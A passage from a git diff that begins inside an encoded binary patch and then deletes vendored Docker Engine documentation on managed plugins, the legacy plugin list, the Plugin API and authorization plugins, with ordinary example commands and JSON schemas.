z3nc_bG&Rs~q$|8m~-etE+C*k176>Zd!=5li@NKu;qB$Yq<&QJgRTC!G9E$gtMU`~4t^|k47 zarNL5ephp;KV94x1q`G;cL!M+{ciCdQnek21{*l<{(Sldos*7f57_Pf5K(`0HjE^7 zwSzo$!yFu-h*IVr{1VTsY^I5~;>VPTfl|jC8Ug9~p7$g`7Y*&ihR6A$R{aO51fo5r zzMo_Bi0Ny^Q#Es8ZBGuNK8qjQ^psP_6H_H_58Z9pQz!z?*8%-r7w9@&$m7Ae75C(T zu;hq^W3N@dh;`Sr6$&6q6ho=80(vp*w{(C49s*2aQsS^n)wnj)DT5wFIB@g~GIT(W zCcBF05$vC6pSO+c{|(21qiaE~E50C_m3SR&p7)fH_U70Dkb!7n2us&g4vb3{Aq7hr z+PEQW&vxdh1gX&oi=C(wJQ~(3GceB&jRQ~3vh$qHC9l&>Fy!moxOn}u1xrvL`cHFC zGAg8vv+NzBQscM&wzLR7?AyB)107xCxVXMK;2GR9ZyUIrf*XM5v5$v@@JAj$K0(b^WDx*A6(#xvTZ!}PbI zsvzr@!Nb4-pAKb?&Z;19C-d5fB^wd@$LBAEd*X70W;3Ap(n({8<0wkxq{`6J70v!P z&5aT!#!zt7#imRLi{-?8OZlt*w}U(3fAx$04~|(l+CFKhNaOv;#QyHOY`yF6 zXiJjF@d7&ctP68U@Rt9Y@_{;eex^{1jD+PsDneOK5qu3~|Nngr&uIN23q>kpTm=}a z>Z-oPMJq@)YeAK~Nev>mJ%Iw_+Y%SWa^5NS(B1pk(}@@`{H*a{vyFxEP8E_@(nMLM z)A+GFDiW_<%>Pn6DF0|`KMUXx9hJ9261pWVa0!W4(z%K4Fst(ezxeXkH&C3BIX(4r zN#Pl=;Ud2g;3jSTiHXOkt_=T1T0+OE#vgUo4hrZiMgShdF8~nFcbJ9)_#JH$C%`ki zl_W7cJp@qzlAqdSg&Tg>M6(UM{s17n?fL`2 zQ`z?KuL+LZiESx_$iskC!!8WK7|qb(0NSp)7^PRth=7Z>isHy2!r7XCVJD{Ao zHA%3@c#VWD%Oo`U9Aj-qsU*p1IK{gx9p6P9h?rScNaDPFu+(3Stb?O0WX97 z0NXtQ(|aQf(vdIXokMeA@hgh@1I=C1$Kt8>Z3Z^UtMIm8(6O(LSpS~%%bvDi0Zr;w zbv54H68G*dg>JA%Ukf6}ARGV;U_#T;YO^jdrEamIp`mvab%4tr1kHO8$WmRny*glQ zuSHT^y727}=G+P&got|i;oe#$yr}^3Yah4fd&5AA7z&0U_gf3tOU!;uH2vbN9OBp9 zQfg9qPR?BN-maoG-{GAptf};2*jU{r5rH!oVlXDiPaTv1e*~AMj))pR!I=WlON}E> z)$#b_w_KSzfQR&9f$BpWeAPRI88LC+2T4X_FA(OyQUs)z8@^Hk9YIAJ$xvm!PZB7F z);klo-y`>ch*DS2kTUG)=_y7!*^gLdybKD1uvuilV=arQYwrPuxGIPmDe*&O-3oOWl!pL4ZQqngo|(9JU_>ruvq9PBv5}L2A8(1Y`oSQzeUmoK z3C_aAQ?Oi=3tN3CT9?ZN3JW2<4*_-5$j%~E%+bLeMyHiKG$cqsHqm(_pUykqfu$2n z^!4v#AbO@-`$*S2V!vns91Z-ZaOaIbrb%k^q8yCDcjKu#n!SkAf+lxxS`;B%jY%tZ z=$$n@4<&GfA09%kRf*F+3l) z*5)R(pK7!?9YMpH4j{Q92tt(GaNle?{Wi7JqOcdV!SVWCuZ3_Nd)Q~3jYaI;N3muR ze7Kj@nA<03d3rh{Bh(%lQ1V>M;}*v8$c7Q}Dg{0^#AIJst?&POG*MwYabr!KaV@Q| zVIhOH-}}?T#GaH(#)8Pyj|U}3M$K7@^K=Jk=t^pTvoJY(`*IIY&wmyc7A$;yGZpNi zWrLlP_%1Q+Ovm9NHYPT9Gxs=WChS{eW25AGmxm7@7GGUwlco+0Nlj%m7fvb47)@*_ zE-TBsYbU`}5RFps*{>d7>HO&&IyGe)laYa@ymE_p<;EoDF?$(~60NGMOB-~wZ@Ts< zFVnvN{d?^pR9?uAKgug5E{@}a)vK|o(NUF$&uDiZ_l?+$Gm{f7=_DNU81P*jn4T7B zF|Cxiaf8D+GAb(Qqg5`8hklt}sh>UH(9n>Don5%Y(*3)4v!)oAencj-k`60+W+o;U zJpVv7cKn3-sg&7{BO^UMn{-M_%7h69y)RCAK1k8WM`p-waR2dnZD3+TyS24t;q0u%#Kc6*G1)$|wG}t?MNCXgw>4_#)JTCV zJjSQar1T%lnSHi)?qQM7R(Yv3ipK$M1_2WsX;+v;r-JM1t~oh7D|lqfuH$viMrOop?yq{o*Jp5Kep4{aAv%Brru zx9=t6j6*&AzOcBcTvk~bUQlqw%}RDsQ}<6HWz@;+tcAZe-?f^~PKCp>PWWbGpPvlt z>+6>shKG|nucChaURi;CjfDL(E-H$2yNiUfkeOpr;&QfZMj!PB!bastQgKa9%}2}{ z%zR3Rjnn_?r|qwIiT8{b6H46q{d<;; ztu0$$FZnsH+i5;#W@ba?j%iqnJZ*=^W!GBWaI2NUj2h|5;qD*TJ9s1|Q>MyoOq?c5 zc0fm# zGZtGCpOC<_va*u*+(m(mj7+iUsfWj1Ch}lmQBlPee>uNRSJWpISBMwAGWQ#8h9yGD z;+&j-j3B0;o12@LHp#~150@4fv%L6~g-{|+Ed9!|$BNjL^mJWeVPTyc(VpE> z&CShA$8x?kN%8T~>1u5xK?+i2J<8T)jo$_bxh*X%OUUEz5e*pKuCbfum!4pcAs!`D zljrPAi?JqBA=#{VH^*^KQ@U;@DSqGM@QWZ%y+V5J-@#k&HFsUEr+1@=WH?xk>+9>o z-v4ATd?1_>a{1j468QZMLIQgHNLvi%J88@VEcV4USqa6*0U{zIB_!CUfu+^eNP}$D zmLC&d9q)}xHEX|rbL*8Ryph2~X{f7v+kX4nU+23(m(7a%Ha~CWY%D1$d0ttF4?fAo zM9$mJ#L3(|sev=DGg+qVnC)(ntHT>DDlJttG&0Jy7B-?UGr$o%->*6odqE~k&O%a& zBfWaQVu5ah32wSi{kCIsTiX>i|M1brdhNXgMzov0zwdOmH$*1Bj8l|jM^Wt)QMK>U z=EV-7fbai#n_)Jes=qyv$qFivHO`FbB)MrEGI@!-8@;UeK z-^Abla@yPbeBDE;bH$yD@5)%Hs$R)OGQ&hzP@H%qerHBX_QyUfE*32=FaI+-I=cNW z7>mVHV|IJB - -# Docker Engine managed plugin system - -* [Installing and using a plugin](index.md#installing-and-using-a-plugin) -* [Developing a plugin](index.md#developing-a-plugin) - -Docker Engine's plugins system allows you to install, start, stop, and remove -plugins using Docker Engine. This mechanism is currently only available for -volume drivers, but more plugin driver types will be available in future releases. - -For information about the legacy plugin system available in Docker Engine 1.12 -and earlier, see [Understand legacy Docker Engine plugins](legacy_plugins.md). - -> **Note**: Docker Engine managed plugins are currently not supported -on Windows daemons. - -## Installing and using a plugin - -Plugins are distributed as Docker images and can be hosted on Docker Hub or on -a private registry. - -To install a plugin, use the `docker plugin install` command, which pulls the -plugin from Docker hub or your private registry, prompts you to grant -permissions or capabilities if necessary, and enables the plugin. - -To check the status of installed plugins, use the `docker plugin ls` command. -Plugins that start successfully are listed as enabled in the output. - -After a plugin is installed, you can use it as an option for another Docker -operation, such as creating a volume. - -In the following example, you install the `sshfs` plugin, verify that it is -enabled, and use it to create a volume. - -1. Install the `sshfs` plugin. - - ```bash - $ docker plugin install vieux/sshfs - - Plugin "vieux/sshfs" is requesting the following privileges: - - network: [host] - - capabilities: [CAP_SYS_ADMIN] - Do you grant the above permissions? [y/N] y - - vieux/sshfs - ``` - - The plugin requests 2 privileges: - - It needs access to the `host` network. - - It needs the `CAP_SYS_ADMIN` capability, which allows the plugin to run - the `mount` command. - -2. Check that the plugin is enabled in the output of `docker plugin ls`. - - ```bash - $ docker plugin ls - - ID NAME TAG DESCRIPTION ENABLED - 69553ca1d789 vieux/sshfs latest the `sshfs` plugin true - ``` - -3. Create a volume using the plugin. - This example mounts the `/remote` directory on host `1.2.3.4` into a - volume named `sshvolume`. This volume can now be mounted into containers. - - ```bash - $ docker volume create \ - -d vieux/sshfs \ - --name sshvolume \ - -o sshcmd=user@1.2.3.4:/remote - - sshvolume - ``` -4. Verify that the volume was created successfully. - - ```bash - $ docker volume ls - - DRIVER NAME - vieux/sshfs sshvolume - ``` - -5. Start a container that uses the volume `sshvolume`. - - ```bash - $ docker run -v sshvolume:/data busybox ls /data - - - ``` - -To disable a plugin, use the `docker plugin disable` command. To completely -remove it, use the `docker plugin remove` command. For other available -commands and options, see the -[command line reference](../reference/commandline/index.md). - -## Service creation using plugins - -In swarm mode, it is possible to create a service that allows for attaching -to networks or mounting volumes. Swarm schedules services based on plugin availability -on a node. In this example, a volume plugin is installed on a swarm worker and a volume -is created using the plugin. In the manager, a service is created with the relevant -mount options. It can be observed that the service is scheduled to run on the worker -node with the said volume plugin and volume. - -In the following example, node1 is the manager and node2 is the worker. - -1. Prepare manager. In node 1: - - ```bash - $ docker swarm init - Swarm initialized: current node (dxn1zf6l61qsb1josjja83ngz) is now a manager. - ``` - -2. Join swarm, install plugin and create volume on worker. In node 2: - - ```bash - $ docker swarm join \ - --token SWMTKN-1-49nj1cmql0jkz5s954yi3oex3nedyz0fb0xx14ie39trti4wxv-8vxv8rssmk743ojnwacrr2e7c \ - 192.168.99.100:2377 - ``` - - ```bash - $ docker plugin install tiborvass/sample-volume-plugin - latest: Pulling from tiborvass/sample-volume-plugin - eb9c16fbdc53: Download complete - Digest: sha256:00b42de88f3a3e0342e7b35fa62394b0a9ceb54d37f4c50be5d3167899994639 - Status: Downloaded newer image for tiborvass/sample-volume-plugin:latest - Installed plugin tiborvass/sample-volume-plugin - ``` - - ```bash - $ docker volume create -d tiborvass/sample-volume-plugin --name pluginVol - ``` - -3. Create a service using the plugin and volume. In node1: - - ```bash - $ docker service create --name my-service --mount type=volume,volume-driver=tiborvass/sample-volume-plugin,source=pluginVol,destination=/tmp busybox top - - $ docker service ls - z1sj8bb8jnfn my-service replicated 1/1 busybox:latest - ``` - docker service ls shows service 1 instance of service running. - -4. Observe the task getting scheduled in node 2: - - ```bash - $ docker ps --format '{{.ID}}\t {{.Status}} {{.Names}} {{.Command}}' - 83fc1e842599 Up 2 days my-service.1.9jn59qzn7nbc3m0zt1hij12xs "top" - ``` - -## Developing a plugin - -#### The rootfs directory -The `rootfs` directory represents the root filesystem of the plugin. In this -example, it was created from a Dockerfile: - ->**Note:** The `/run/docker/plugins` directory is mandatory inside of the -plugin's filesystem for docker to communicate with the plugin. - -```bash -$ git clone https://github.com/vieux/docker-volume-sshfs -$ cd docker-volume-sshfs -$ docker build -t rootfsimage . -$ id=$(docker create rootfsimage true) # id was cd851ce43a403 when the image was created -$ sudo mkdir -p myplugin/rootfs -$ sudo docker export "$id" | sudo tar -x -C myplugin/rootfs -$ docker rm -vf "$id" -$ docker rmi rootfsimage -``` - -#### The config.json file - -The `config.json` file describes the plugin. See the [plugins config reference](config.md). - -Consider the following `config.json` file. - -```json -{ - "description": "sshFS plugin for Docker", - "documentation": "https://docs.docker.com/engine/extend/plugins/", - "entrypoint": ["/go/bin/docker-volume-sshfs"], - "network": { - "type": "host" - }, - "interface" : { - "types": ["docker.volumedriver/1.0"], - "socket": "sshfs.sock" - }, - "capabilities": ["CAP_SYS_ADMIN"] -} -``` - -This plugin is a volume driver. It requires a `host` network and the -`CAP_SYS_ADMIN` capability. It depends upon the `/go/bin/docker-volume-sshfs` -entrypoint and uses the `/run/docker/plugins/sshfs.sock` socket to communicate -with Docker Engine. This plugin has no runtime parameters. - -#### Creating the plugin - -A new plugin can be created by running -`docker plugin create ./path/to/plugin/data` where the plugin -data contains a plugin configuration file `config.json` and a root filesystem -in subdirectory `rootfs`. - -After that the plugin `` will show up in `docker plugin ls`. -Plugins can be pushed to remote registries with -`docker plugin push `. diff --git a/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md b/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md deleted file mode 100644 index 6ac914e366..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md +++ /dev/null @@ -1,98 +0,0 @@ ---- -redirect_from: -- "/engine/extend/plugins/" -title: "Use Docker Engine plugins" -description: "How to add additional functionality to Docker with plugins extensions" -keywords: "Examples, Usage, plugins, docker, documentation, user guide" ---- - - - -# Use Docker Engine plugins - -This document describes the Docker Engine plugins generally available in Docker -Engine. To view information on plugins managed by Docker, -refer to [Docker Engine plugin system](index.md). - -You can extend the capabilities of the Docker Engine by loading third-party -plugins. This page explains the types of plugins and provides links to several -volume and network plugins for Docker. - -## Types of plugins - -Plugins extend Docker's functionality. They come in specific types. For -example, a [volume plugin](plugins_volume.md) might enable Docker -volumes to persist across multiple Docker hosts and a -[network plugin](plugins_network.md) might provide network plumbing. - -Currently Docker supports authorization, volume and network driver plugins. In the future it -will support additional plugin types. - -## Installing a plugin - -Follow the instructions in the plugin's documentation. - -## Finding a plugin - -The sections below provide an inexhaustive overview of available plugins. - - - -### Network plugins - -Plugin | Description ------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -[Contiv Networking](https://github.com/contiv/netplugin) | An open source network plugin to provide infrastructure and security policies for a multi-tenant micro services deployment, while providing an integration to physical network for non-container workload. Contiv Networking implements the remote driver and IPAM APIs available in Docker 1.9 onwards. -[Kuryr Network Plugin](https://github.com/openstack/kuryr) | A network plugin is developed as part of the OpenStack Kuryr project and implements the Docker networking (libnetwork) remote driver API by utilizing Neutron, the OpenStack networking service. It includes an IPAM driver as well. -[Weave Network Plugin](https://www.weave.works/docs/net/latest/introducing-weave/) | A network plugin that creates a virtual network that connects your Docker containers - across multiple hosts or clouds and enables automatic discovery of applications. Weave networks are resilient, partition tolerant, secure and work in partially connected networks, and other adverse environments - all configured with delightful simplicity. - -### Volume plugins - -Plugin | Description ------------------------------------------------------------------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -[Azure File Storage plugin](https://github.com/Azure/azurefile-dockervolumedriver) | Lets you mount Microsoft [Azure File Storage](https://azure.microsoft.com/blog/azure-file-storage-now-generally-available/) shares to Docker containers as volumes using the SMB 3.0 protocol. [Learn more](https://azure.microsoft.com/blog/persistent-docker-volumes-with-azure-file-storage/). -[Blockbridge plugin](https://github.com/blockbridge/blockbridge-docker-volume) | A volume plugin that provides access to an extensible set of container-based persistent storage options. It supports single and multi-host Docker environments with features that include tenant isolation, automated provisioning, encryption, secure deletion, snapshots and QoS. -[Contiv Volume Plugin](https://github.com/contiv/volplugin) | An open source volume plugin that provides multi-tenant, persistent, distributed storage with intent based consumption. It has support for Ceph and NFS. -[Convoy plugin](https://github.com/rancher/convoy) | A volume plugin for a variety of storage back-ends including device mapper and NFS. It's a simple standalone executable written in Go and provides the framework to support vendor-specific extensions such as snapshots, backups and restore. -[DRBD plugin](https://www.drbd.org/en/supported-projects/docker) | A volume plugin that provides highly available storage replicated by [DRBD](https://www.drbd.org). Data written to the docker volume is replicated in a cluster of DRBD nodes. -[Flocker plugin](https://clusterhq.com/docker-plugin/) | A volume plugin that provides multi-host portable volumes for Docker, enabling you to run databases and other stateful containers and move them around across a cluster of machines. -[gce-docker plugin](https://github.com/mcuadros/gce-docker) | A volume plugin able to attach, format and mount Google Compute [persistent-disks](https://cloud.google.com/compute/docs/disks/persistent-disks). -[GlusterFS plugin](https://github.com/calavera/docker-volume-glusterfs) | A volume plugin that provides multi-host volumes management for Docker using GlusterFS. -[Horcrux Volume Plugin](https://github.com/muthu-r/horcrux) | A volume plugin that allows on-demand, version controlled access to your data. Horcrux is an open-source plugin, written in Go, and supports SCP, [Minio](https://www.minio.io) and Amazon S3. -[HPE 3Par Volume Plugin](https://github.com/hpe-storage/python-hpedockerplugin/) | A volume plugin that supports HPE 3Par and StoreVirtual iSCSI storage arrays. -[IPFS Volume Plugin](http://github.com/vdemeester/docker-volume-ipfs) | An open source volume plugin that allows using an [ipfs](https://ipfs.io/) filesystem as a volume. -[Keywhiz plugin](https://github.com/calavera/docker-volume-keywhiz) | A plugin that provides credentials and secret management using Keywhiz as a central repository. -[Local Persist Plugin](https://github.com/CWSpear/local-persist) | A volume plugin that extends the default `local` driver's functionality by allowing you specify a mountpoint anywhere on the host, which enables the files to *always persist*, even if the volume is removed via `docker volume rm`. -[NetApp Plugin](https://github.com/NetApp/netappdvp) (nDVP) | A volume plugin that provides direct integration with the Docker ecosystem for the NetApp storage portfolio. The nDVP package supports the provisioning and management of storage resources from the storage platform to Docker hosts, with a robust framework for adding additional platforms in the future. -[Netshare plugin](https://github.com/ContainX/docker-volume-netshare) | A volume plugin that provides volume management for NFS 3/4, AWS EFS and CIFS file systems. -[OpenStorage Plugin](https://github.com/libopenstorage/openstorage) | A cluster-aware volume plugin that provides volume management for file and block storage solutions. It implements a vendor neutral specification for implementing extensions such as CoS, encryption, and snapshots. It has example drivers based on FUSE, NFS, NBD and EBS to name a few. -[Portworx Volume Plugin](https://github.com/portworx/px-dev) | A volume plugin that turns any server into a scale-out converged compute/storage node, providing container granular storage and highly available volumes across any node, using a shared-nothing storage backend that works with any docker scheduler. -[Quobyte Volume Plugin](https://github.com/quobyte/docker-volume) | A volume plugin that connects Docker to [Quobyte](http://www.quobyte.com/containers)'s data center file system, a general-purpose scalable and fault-tolerant storage platform. -[REX-Ray plugin](https://github.com/emccode/rexray) | A volume plugin which is written in Go and provides advanced storage functionality for many platforms including VirtualBox, EC2, Google Compute Engine, OpenStack, and EMC. -[Virtuozzo Storage and Ploop plugin](https://github.com/virtuozzo/docker-volume-ploop) | A volume plugin with support for Virtuozzo Storage distributed cloud file system as well as ploop devices. -[VMware vSphere Storage Plugin](https://github.com/vmware/docker-volume-vsphere) | Docker Volume Driver for vSphere enables customers to address persistent storage requirements for Docker containers in vSphere environments. - -### Authorization plugins - - Plugin | Description -------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ - [Twistlock AuthZ Broker](https://github.com/twistlock/authz) | A basic extendable authorization plugin that runs directly on the host or inside a container. This plugin allows you to define user policies that it evaluates during authorization. Basic authorization is provided if Docker daemon is started with the --tlsverify flag (username is extracted from the certificate common name). - -## Troubleshooting a plugin - -If you are having problems with Docker after loading a plugin, ask the authors -of the plugin for help. The Docker team may not be able to assist you. - -## Writing a plugin - -If you are interested in writing a plugin for Docker, or seeing how they work -under the hood, see the [docker plugins reference](plugin_api.md). diff --git a/vendor/github.com/docker/docker/docs/extend/plugin_api.md b/vendor/github.com/docker/docker/docs/extend/plugin_api.md deleted file mode 100644 index 693b77a2f3..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/plugin_api.md +++ /dev/null @@ -1,196 +0,0 @@ ---- -title: "Plugins API" -description: "How to write Docker plugins extensions " -keywords: "API, Usage, plugins, documentation, developer" ---- - - - -# Docker Plugin API - -Docker plugins are out-of-process extensions which add capabilities to the -Docker Engine. - -This document describes the Docker Engine plugin API. To view information on -plugins managed by Docker Engine, refer to [Docker Engine plugin system](index.md). - -This page is intended for people who want to develop their own Docker plugin. -If you just want to learn about or use Docker plugins, look -[here](legacy_plugins.md). - -## What plugins are - -A plugin is a process running on the same or a different host as the docker daemon, -which registers itself by placing a file on the same docker host in one of the plugin -directories described in [Plugin discovery](#plugin-discovery). - -Plugins have human-readable names, which are short, lowercase strings. For -example, `flocker` or `weave`. - -Plugins can run inside or outside containers. Currently running them outside -containers is recommended. - -## Plugin discovery - -Docker discovers plugins by looking for them in the plugin directory whenever a -user or container tries to use one by name. - -There are three types of files which can be put in the plugin directory. - -* `.sock` files are UNIX domain sockets. -* `.spec` files are text files containing a URL, such as `unix:///other.sock` or `tcp://localhost:8080`. -* `.json` files are text files containing a full json specification for the plugin. - -Plugins with UNIX domain socket files must run on the same docker host, whereas -plugins with spec or json files can run on a different host if a remote URL is specified. - -UNIX domain socket files must be located under `/run/docker/plugins`, whereas -spec files can be located either under `/etc/docker/plugins` or `/usr/lib/docker/plugins`. - -The name of the file (excluding the extension) determines the plugin name. - -For example, the `flocker` plugin might create a UNIX socket at -`/run/docker/plugins/flocker.sock`. - -You can define each plugin into a separated subdirectory if you want to isolate definitions from each other. -For example, you can create the `flocker` socket under `/run/docker/plugins/flocker/flocker.sock` and only -mount `/run/docker/plugins/flocker` inside the `flocker` container. - -Docker always searches for unix sockets in `/run/docker/plugins` first. It checks for spec or json files under -`/etc/docker/plugins` and `/usr/lib/docker/plugins` if the socket doesn't exist. The directory scan stops as -soon as it finds the first plugin definition with the given name. - -### JSON specification - -This is the JSON format for a plugin: - -```json -{ - "Name": "plugin-example", - "Addr": "https://example.com/docker/plugin", - "TLSConfig": { - "InsecureSkipVerify": false, - "CAFile": "/usr/shared/docker/certs/example-ca.pem", - "CertFile": "/usr/shared/docker/certs/example-cert.pem", - "KeyFile": "/usr/shared/docker/certs/example-key.pem" - } -} -``` - -The `TLSConfig` field is optional and TLS will only be verified if this configuration is present. - -## Plugin lifecycle - -Plugins should be started before Docker, and stopped after Docker. For -example, when packaging a plugin for a platform which supports `systemd`, you -might use [`systemd` dependencies]( -http://www.freedesktop.org/software/systemd/man/systemd.unit.html#Before=) to -manage startup and shutdown order. - -When upgrading a plugin, you should first stop the Docker daemon, upgrade the -plugin, then start Docker again. - -## Plugin activation - -When a plugin is first referred to -- either by a user referring to it by name -(e.g. `docker run --volume-driver=foo`) or a container already configured to -use a plugin being started -- Docker looks for the named plugin in the plugin -directory and activates it with a handshake. See Handshake API below. - -Plugins are *not* activated automatically at Docker daemon startup. Rather, -they are activated only lazily, or on-demand, when they are needed. - -## Systemd socket activation - -Plugins may also be socket activated by `systemd`. The official [Plugins helpers](https://github.com/docker/go-plugins-helpers) -natively supports socket activation. In order for a plugin to be socket activated it needs -a `service` file and a `socket` file. - -The `service` file (for example `/lib/systemd/system/your-plugin.service`): - -``` -[Unit] -Description=Your plugin -Before=docker.service -After=network.target your-plugin.socket -Requires=your-plugin.socket docker.service - -[Service] -ExecStart=/usr/lib/docker/your-plugin - -[Install] -WantedBy=multi-user.target -``` -The `socket` file (for example `/lib/systemd/system/your-plugin.socket`): - -``` -[Unit] -Description=Your plugin - -[Socket] -ListenStream=/run/docker/plugins/your-plugin.sock - -[Install] -WantedBy=sockets.target -``` - -This will allow plugins to be actually started when the Docker daemon connects to -the sockets they're listening on (for instance the first time the daemon uses them -or if one of the plugin goes down accidentally). - -## API design - -The Plugin API is RPC-style JSON over HTTP, much like webhooks. - -Requests flow *from* the Docker daemon *to* the plugin. So the plugin needs to -implement an HTTP server and bind this to the UNIX socket mentioned in the -"plugin discovery" section. - -All requests are HTTP `POST` requests. - -The API is versioned via an Accept header, which currently is always set to -`application/vnd.docker.plugins.v1+json`. - -## Handshake API - -Plugins are activated via the following "handshake" API call. - -### /Plugin.Activate - -**Request:** empty body - -**Response:** -``` -{ - "Implements": ["VolumeDriver"] -} -``` - -Responds with a list of Docker subsystems which this plugin implements. -After activation, the plugin will then be sent events from this subsystem. - -Possible values are: - -* [`authz`](plugins_authorization.md) -* [`NetworkDriver`](plugins_network.md) -* [`VolumeDriver`](plugins_volume.md) - - -## Plugin retries - -Attempts to call a method on a plugin are retried with an exponential backoff -for up to 30 seconds. This may help when packaging plugins as containers, since -it gives plugin containers a chance to start up before failing any user -containers which depend on them. - -## Plugins helpers - -To ease plugins development, we're providing an `sdk` for each kind of plugins -currently supported by Docker at [docker/go-plugins-helpers](https://github.com/docker/go-plugins-helpers). diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md b/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md deleted file mode 100644 index ac1837f754..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md +++ /dev/null @@ -1,260 +0,0 @@ ---- -title: "Access authorization plugin" -description: "How to create authorization plugins to manage access control to your Docker daemon." -keywords: "security, authorization, authentication, docker, documentation, plugin, extend" -redirect_from: -- "/engine/extend/authorization/" ---- - - - -# Create an authorization plugin - -This document describes the Docker Engine plugins generally available in Docker -Engine. To view information on plugins managed by Docker Engine, -refer to [Docker Engine plugin system](index.md). - -Docker's out-of-the-box authorization model is all or nothing. Any user with -permission to access the Docker daemon can run any Docker client command. The -same is true for callers using Docker's Engine API to contact the daemon. If you -require greater access control, you can create authorization plugins and add -them to your Docker daemon configuration. Using an authorization plugin, a -Docker administrator can configure granular access policies for managing access -to Docker daemon. - -Anyone with the appropriate skills can develop an authorization plugin. These -skills, at their most basic, are knowledge of Docker, understanding of REST, and -sound programming knowledge. This document describes the architecture, state, -and methods information available to an authorization plugin developer. - -## Basic principles - -Docker's [plugin infrastructure](plugin_api.md) enables -extending Docker by loading, removing and communicating with -third-party components using a generic API. The access authorization subsystem -was built using this mechanism. - -Using this subsystem, you don't need to rebuild the Docker daemon to add an -authorization plugin. You can add a plugin to an installed Docker daemon. You do -need to restart the Docker daemon to add a new plugin. - -An authorization plugin approves or denies requests to the Docker daemon based -on both the current authentication context and the command context. The -authentication context contains all user details and the authentication method. -The command context contains all the relevant request data. - -Authorization plugins must follow the rules described in [Docker Plugin API](plugin_api.md). -Each plugin must reside within directories described under the -[Plugin discovery](plugin_api.md#plugin-discovery) section. - -**Note**: the abbreviations `AuthZ` and `AuthN` mean authorization and authentication -respectively. - -## Default user authorization mechanism - -If TLS is enabled in the [Docker daemon](https://docs.docker.com/engine/security/https/), the default user authorization flow extracts the user details from the certificate subject name. -That is, the `User` field is set to the client certificate subject common name, and the `AuthenticationMethod` field is set to `TLS`. - -## Basic architecture - -You are responsible for registering your plugin as part of the Docker daemon -startup. You can install multiple plugins and chain them together. This chain -can be ordered. Each request to the daemon passes in order through the chain. -Only when all the plugins grant access to the resource, is the access granted. - -When an HTTP request is made to the Docker daemon through the CLI or via the -Engine API, the authentication subsystem passes the request to the installed -authentication plugin(s). The request contains the user (caller) and command -context. The plugin is responsible for deciding whether to allow or deny the -request. - -The sequence diagrams below depict an allow and deny authorization flow: - -![Authorization Allow flow](images/authz_allow.png) - -![Authorization Deny flow](images/authz_deny.png) - -Each request sent to the plugin includes the authenticated user, the HTTP -headers, and the request/response body. Only the user name and the -authentication method used are passed to the plugin. Most importantly, no user -credentials or tokens are passed. Finally, not all request/response bodies -are sent to the authorization plugin. Only those request/response bodies where -the `Content-Type` is either `text/*` or `application/json` are sent. - -For commands that can potentially hijack the HTTP connection (`HTTP -Upgrade`), such as `exec`, the authorization plugin is only called for the -initial HTTP requests. Once the plugin approves the command, authorization is -not applied to the rest of the flow. Specifically, the streaming data is not -passed to the authorization plugins. For commands that return chunked HTTP -response, such as `logs` and `events`, only the HTTP request is sent to the -authorization plugins. - -During request/response processing, some authorization flows might -need to do additional queries to the Docker daemon. To complete such flows, -plugins can call the daemon API similar to a regular user. To enable these -additional queries, the plugin must provide the means for an administrator to -configure proper authentication and security policies. - -## Docker client flows - -To enable and configure the authorization plugin, the plugin developer must -support the Docker client interactions detailed in this section. - -### Setting up Docker daemon - -Enable the authorization plugin with a dedicated command line flag in the -`--authorization-plugin=PLUGIN_ID` format. The flag supplies a `PLUGIN_ID` -value. This value can be the plugin’s socket or a path to a specification file. -Authorization plugins can be loaded without restarting the daemon. Refer -to the [`dockerd` documentation](../reference/commandline/dockerd.md#configuration-reloading) for more information. - -```bash -$ dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... -``` - -Docker's authorization subsystem supports multiple `--authorization-plugin` parameters. - -### Calling authorized command (allow) - -```bash -$ docker pull centos -... -f1b10cd84249: Pull complete -... -``` - -### Calling unauthorized command (deny) - -```bash -$ docker pull centos -... -docker: Error response from daemon: authorization denied by plugin PLUGIN_NAME: volumes are not allowed. -``` - -### Error from plugins - -```bash -$ docker pull centos -... -docker: Error response from daemon: plugin PLUGIN_NAME failed with error: AuthZPlugin.AuthZReq: Cannot connect to the Docker daemon. Is the docker daemon running on this host?. -``` - -## API schema and implementation - -In addition to Docker's standard plugin registration method, each plugin -should implement the following two methods: - -* `/AuthZPlugin.AuthZReq` This authorize request method is called before the Docker daemon processes the client request. - -* `/AuthZPlugin.AuthZRes` This authorize response method is called before the response is returned from Docker daemon to the client. - -#### /AuthZPlugin.AuthZReq - -**Request**: - -```json -{ - "User": "The user identification", - "UserAuthNMethod": "The authentication method used", - "RequestMethod": "The HTTP method", - "RequestURI": "The HTTP request URI", - "RequestBody": "Byte array containing the raw HTTP request body", - "RequestHeader": "Byte array containing the raw HTTP request header as a map[string][]string " -} -``` - -**Response**: - -```json -{ - "Allow": "Determined whether the user is allowed or not", - "Msg": "The authorization message", - "Err": "The error message if things go wrong" -} -``` -#### /AuthZPlugin.AuthZRes - -**Request**: - -```json -{ - "User": "The user identification", - "UserAuthNMethod": "The authentication method used", - "RequestMethod": "The HTTP method", - "RequestURI": "The HTTP request URI", - "RequestBody": "Byte array containing the raw HTTP request body", - "RequestHeader": "Byte array containing the raw HTTP request header as a map[string][]string", - "ResponseBody": "Byte array containing the raw HTTP response body", - "ResponseHeader": "Byte array containing the raw HTTP response header as a map[string][]string", - "ResponseStatusCode":"Response status code" -} -``` - -**Response**: - -```json -{ - "Allow": "Determined whether the user is allowed or not", - "Msg": "The authorization message", - "Err": "The error message if things go wrong" -} -``` - -### Request authorization - -Each plugin must support two request authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. The tables below detail the content expected in each message. - -#### Daemon -> Plugin - -Name | Type | Description ------------------------|-------------------|------------------------------------------------------- -User | string | The user identification -Authentication method | string | The authentication method used -Request method | enum | The HTTP method (GET/DELETE/POST) -Request URI | string | The HTTP request URI including API version (e.g., v.1.17/containers/json) -Request headers | map[string]string | Request headers as key value pairs (without the authorization header) -Request body | []byte | Raw request body 